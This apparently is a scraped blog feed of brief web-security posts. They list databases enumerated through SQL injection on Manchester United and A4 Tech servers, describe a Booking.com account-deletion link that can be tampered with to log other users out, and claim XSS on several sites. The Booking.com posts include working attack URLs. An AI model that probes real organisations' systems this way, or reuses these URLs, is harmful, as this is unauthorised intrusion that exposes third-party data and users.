Manchester United SQL injection (databases)

t1


[*] [distribution]
[*] Adserver
[*] Alarms
[*] CPAlarm
[*] ECard
[*] Engagement
[*] FAQ
[*] Feedback
[*] Hydra
[*] ImBilling
[*] IMSWebsiteData
[*] INFOMEDIADB1
[*] Integration
[*] LicenseDistribution
[*] Linguistics
[*] Loyalty
[*] master
[*] Messaging
[*] Messaging_ORA
[*] Messaging_TM
[*] Messaging_UAE
[*] MetaDataWarehouse
[*] MobilePayments
[*] MobilePayments_Dev
[*] MobilePayments_DevMigration
[*] MobilePaymentsMigration
[*] model
[*] msdb
[*] Newsfeeds
[*] Notifications
[*] PartnerManagement
[*] PartnerManagementMigration
[*] Projects
[*] PushNotifications
[*] Ratings
[*] reporting
[*] Sessions
[*] SessionsAPPS
[*] SessionsBXCUK
[*] SessionsEEGUK
[*] SessionsEEPUK
[*] SessionsLFCUK
[*] SessionsMUFUK
[*] SessionsOrange
[*] SessionsOSP
[*] SessionsSFCUK
[*] SMS_CRM
[*] Sports
[*] StorefrontOSP
[*] sysdb
[*] tempdb
[*] vringo
Posted in Web Security

Booking.com application design flaw

bookin_635352453632966054
So I decided to do a few tests on secure.booking.com.

Firstly,I created a test user and logged in.On dashboard there is remove account link,I tried to send a request to remove my account
then I got an email that to delete my account

https://secure.booking.com/login.en-us.html?user_id=125612931&confirmation_code=7JoZdMqEuM&op=delete_account&tmpl=profile%2Faccount_deleted&aid=304142

Everything is okay.I clicked to the link and my account removed
Then I registered another account and again I sent again a request to remove my account.

then I got again an email that to delete my account

https://secure.booking.com/login.en-us.html?user_id=125613510&confirmation_code=z59H00KWSm&op=delete_account&tmpl=profile%2Faccount_deleted&aid=304142

Everything looks good so that user id and confirmation_code are different.Then I decided to try something like.
I changed second link’s confirmation_code to first link’s confirmation_code
first link’s code : 7JoZdMqEuM
second link’s code : z59H00KWSm

———–
my new link :

https://secure.booking.com/login.en-us.html?user_id=125613510&confirmation_code=7JoZdMqEuM&op=delete_account&tmpl=profile%2Faccount_deleted&aid=304143

https://secure.booking.com/login.en-us.html?user_id=xxxxxx&confirmation_code=7JoZdMqEuM&op=delete_account&tmpl=profile%2Faccount_deleted&aid=304143

user_id there is no matter,any logged-in user when clicking on this link it will be redirected user to logout action

https://secure.booking.com/login.en-us.html?aid=304143;sid=77acb335fca618f0263a30825583753a;dcid=5;confirmation_code=7JoZdMqEuM;form_posted=0;had_password=0;is_primary=0;op=delete_account;user_id=125613510&;logout=1;account_removed=1

logout=1;
account_removed=1

pay attention on above boolean flags

logout=1;

victim performed unwilling logout

Posted in Web Security

Netbeans.org #XSS

netbeans

Posted in Web Security

Percona.com Stored Xss (Pwned)

percona

 

Tagged with:
Posted in Web Security

Python wappalyzer web application detection tool

https://github.com/camoufl4g3/Wappalyzer

Posted in Python, Web Security

Bayernfc #xss

xssbayern

Tagged with:
Posted in Web Security

A4 Tech blind sql injection 0 day

a4
A4 Tech blind sql injection 0 day

vendor: http://www.a4tech.com
=================================

Microsoft SQL Server 2005 – 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37
Copyright (c) 1988-2005
Microsoft Corporation Standard Edition on Windows NT 6.1 (Build 7601: Service Pack 1)

[Databases]:

*******************
A4tech
A4tech_TWN
a4techshop
AdventureWorks
AdventureWorksDW
bloody
bloodyen
bloodyru
bloodytw
bloodyusa

***********************

=================================
discovered: CAMOUFL4G3 (https://twitter.com/ramal_h)

Tagged with: ,
Posted in Web Security